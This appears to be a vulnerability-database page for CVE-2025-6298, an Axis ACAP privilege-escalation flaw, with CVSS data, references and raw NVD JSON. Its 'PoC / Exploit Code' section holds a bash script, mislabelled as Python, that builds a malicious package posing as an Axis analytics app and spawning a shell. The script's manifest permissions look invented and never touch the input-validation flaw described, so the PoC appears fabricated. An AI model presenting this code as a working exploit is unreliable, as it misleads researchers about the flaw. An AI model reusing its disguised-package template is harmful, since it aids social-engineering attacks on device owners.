CVE-2025-6298

Description

ACAP applications can gain elevated privileges due to improper input validation, potentially leading to privilege escalation. This vulnerability can only be exploited if the Axis device is configured to allow the installation of unsigned ACAP applications, and if an attacker convinces the victim to install a malicious ACAP application.

CVSS Details

CVSS Score

6.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:axis:axis_os:*:*:*:*:active:*:*:* - VULNERABLE

Axis设备 ACAP应用程序框架 (启用未签名应用安装的版本)

允许安装未签名ACAP应用的Axis设备固件

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# CVE-2025-6298 PoC - Malicious ACAP Application Builder
# Note: This PoC is for educational and security research purposes only

# Step 1: Create malicious ACAP application structure
echo "Creating malicious ACAP application package..."
mkdir -p malicious_acap/{app,manifest}

# Step 2: Generate malicious manifest with elevated permissions
cat > malicious_acap/manifest.json << 'EOF'
{
  "name": "legitimate_app",
  "version": "1.0.0",
  "description": "Video analytics utility",
  "vendor": "Axis Communications",
  "license": "proprietary",
  "capabilities": {
    "network": true,
    "file_system": "full",
    "process": "elevated",
    "system_commands": true
  },
  "permissions": [
    "root_access",
    "sudo_execution",
    "full_filesystem_access"
  ]
}
EOF

# Step 3: Create malicious binary payload
echo '#!/bin/sh
echo "Malicious payload executed with elevated privileges" > /tmp/cve-2025-6298_exploit.log
# Add actual malicious code here
/bin/sh -i' > malicious_acap/app/run.sh
chmod +x malicious_acap/app/run.sh

# Step 4: Package the malicious ACAP application
cd malicious_acap
tar -czf ../malicious_acap.tar.gz *
cd ..

echo "Malicious ACAP package created: malicious_acap.tar.gz"
echo "Note: This requires social engineering to convince victim to install the unsigned package"
echo "Prerequisite: Target device must allow unsigned ACAP installation"

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-6298
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-6298
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-6298/
[4] VulDB https://vuldb.com/cve/CVE-2025-6298
[5] https://www.axis.com/dam/public/ef/91/c3/cve-2025-6298pdf-en-US-504215.pdf

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-6298", "sourceIdentifier": "[email protected]", "published": "2025-11-11T07:15:35.397", "lastModified": "2026-01-21T20:06:36.633", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ACAP applications can gain elevated privileges due to improper input validation, potentially leading to privilege escalation. This vulnerability can only be exploited if the Axis device is configured to allow the installation of unsigned ACAP applications, and if an attacker convinces the victim to install a malicious ACAP application."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:axis:axis_os:*:*:*:*:active:*:*:*", "versionEndExcluding": "12.6.28", "matchCriteriaId": "5C82DCF4-9665-43EF-BBD6-0F7608875D76"}]}]}], "references": [{"url": "https://www.axis.com/dam/public/ef/91/c3/cve-2025-6298pdf-en-US-504215.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}